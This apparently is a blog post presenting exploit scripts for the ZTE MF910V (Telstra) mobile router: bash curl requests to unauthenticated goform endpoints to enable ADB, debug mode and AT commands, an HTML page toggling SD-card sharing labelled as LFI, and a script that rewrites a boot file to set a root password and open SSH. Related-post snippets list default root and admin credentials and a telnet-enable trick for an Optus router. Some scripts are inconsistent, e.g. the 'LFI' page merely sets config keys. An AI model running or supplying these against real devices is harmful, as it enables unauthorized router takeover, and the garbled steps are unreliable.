Telstra ZteMF910/v Exploit Scripts

 Telstra ZteMF910/v Exploit Scripts

To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.

Mode Switching and Enabling ADB

To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:

language-bash
#!/bin/bash

# Mode Switching
MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
MODE_SWITCH_VALUE="1"  # Change X to 0 or 1

curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" $MODE_SWITCH_URL

# Enabling ADB
ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X"
ADB_ENABLE_VALUE="6"  # Change X to the desired mode (1-4 for RNDIS, 5 for CDC, 6 for ADB)

curl -s -X POST -d "goformId=USB_MODE_SWITCH&usb_mode=$ADB_ENABLE_VALUE" $ADB_ENABLE_URL

Save the above script as mode_switch.sh and execute it using bash mode_switch.sh. This will perform mode switching and enable ADB on the router.

Executing AT Commands and Enabling Debug Mode

To execute AT commands and enable debug mode on the ZTE MF910V router, we can use the same bash script as above. However, we need to modify the URLs and values accordingly. Here's an example:

language-bash
#!/bin/bash

# Executing AT Commands
AT_COMMANDS_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=AT_COMMAND&command=AT+COMMAND_HERE"

curl -s -X POST -d "goformId=AT_COMMAND&command=AT+COMMAND_HERE" $AT_COMMANDS_URL

# Enabling Debug Mode
DEBUG_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
DEBUG_ENABLE_VALUE="1"  # Change X to 0 or 1

curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$DEBUG_ENABLE_VALUE" $DEBUG_ENABLE_URL

Save the above script as at_commands.sh and execute it using bash at_commands.sh. This will execute AT commands and enable debug mode on the router.

Exploiting LFI (Local File Inclusion)

To exploit the LFI vulnerability on the ZTE MF910V router, we need to modify certain files and uncomment specific functions. We can achieve this by creating an HTML file that makes the necessary changes. Here's an example:

language-html
<!DOCTYPE html>
<html>
<head>
    <script>
        function enableSDCard() {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd_card_state&cfg_value=1", true);
            xhr.send();
        }

        function enableHttpShare() {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare_guest&cfg_value=1", true);
            xhr.send();
        }

        function enableSDCardMenu() {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd&cfg_value=1", true);
            xhr.send();
        }

        function enableSDCardFileViewer() {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare&cfg_value=1", true);
            xhr.send();
        }
    </script>
</head>
<body>
    <button onclick="enableSDCard()">Enable SD Card</button>
    <button onclick="enableHttpShare()">Enable HTTP Share</button>
    <button onclick="enableSDCardMenu()">Enable SD Card Menu</button>
    <button onclick="enableSDCardFileViewer()">Enable SD Card File Viewer</button>
</body>
</html>

Save the above code as exploit.html and open it in a web browser. Clicking on the buttons will send the necessary HTTP requests to enable the corresponding features.

Gaining Root Access

To gain root access on the ZTE MF910V router, we need to modify certain files and execute specific commands. We can achieve this by creating a bash script. Here's an example:

language-bash
#!/bin/bash

# Modify firewall_init.sh
sed -i '92,93s/^/#/' /usr/zte/zte_conf/scripts/firewall_init.sh
echo -e "echo 'password\npassword\n' | passwd" >> /usr/zte/zte_conf/scripts/firewall_init.sh

# Enable SSH
iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT

# Reboot the device
reboot

Save the above script as root_access.sh and execute it using bash root_access.sh. This will modify the necessary files, enable SSH, and reboot the device. After the reboot, you can SSH into the router using the specified username and password.

Comments

Post a Comment

Popular posts from this blog

f@st3864 Telnet/Serial

f@st3864 Telnet/Serial R.e F@st3864v2 Optus F@st3864 The quickest way to openly access this routers administration tools is to log in via http://192.168.0.1/main.html?loginuser=0 logging in with the default admin/Y3s0ptus loginuser=0 ***support/support ***loginuser=1 ***user/user*****loginuser=2 ***To Activate telnet*** going to management/system settings " download this file " sysinfo.f24 open the file in notepad the file splits into two sections the section we want is headed by backup config: <?xml version="1.0"?> <DslCpeConfig version="3.0"> and closed by </InternetGatewayDevice> </DslCpeConfig> so by copying all the xml information between these two points and pasting into a new notepad you have created our new backup file, before we save it and close find <X_GVT_Telnet_Enable>FALSE</X_GVT_Telnet_Enable> Change FALSE to TRUE then save the file as backupconfig.xml then use this XML file to update the settings, also i
Read more

ZTE MF910V Root exploit

ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v  This guide exists in both linux and windows format Please follow the instructions as per O/S or untill instructions converge |+++++++++++++++++++++++++++++++++++++| Default credentials: For ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v root:oelinux123 Web Interface Password: password |+++++++++++++++++++++++++++++++++++++| Getting Setup: Download the mode switch html to run locally: http://lopoteam.com/3AY9 Also ensure you have ADB (Android Debug Bridge) installed on your computer: ADB: Linux: https://dl.google.com/android/repository/platform-tools-latest-linux.zip http://lopoteam.com/37Bw Windows: https://dl.google.com/android/repository/platform-tools-latest-windows.zip http://lopoteam.com/37Ac |+++++++++++++++++++++++++++++++++++++| Lets Begin |+++++++++++++++++++++++++++++++++++++| Plug your device into the computer to download drivers. Linux: Open Terminal cd (*a
Read more

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug AT mode : /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X Change X to either 0 or 1 this enables and disables qualcomm services, Debub / Adb :  /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X Change X to be the value matching the desired mode. 1-4 is RNDIS 5 is CDC 6 is ADB. or this page is uploaded to any web dir: UPDATED(2017) Download this file: tools.html Upload it to any directory and use it to switch thru modes via html
Read more